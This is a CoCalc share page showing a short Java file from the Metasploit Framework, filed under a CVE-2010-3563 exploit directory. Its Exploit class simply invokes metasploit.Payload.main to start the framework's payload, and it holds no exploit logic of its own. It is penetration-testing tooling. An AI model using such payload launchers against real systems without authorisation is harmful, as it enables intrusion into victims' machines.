CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/exploits/CVE-2010-3563/Exploit.java
Views: 11779
1
import metasploit.Payload;
2
3
/**
4
*
5
* This class starts the metasploit payload.
6
* @author mka
7
*
8
*/
9
public class Exploit {
10
public static void main(String[] args) {
11
try {
12
Payload.main(null);
13
} catch (Exception e) {
14
e.printStackTrace();
15
}
16
}
17
}
18
19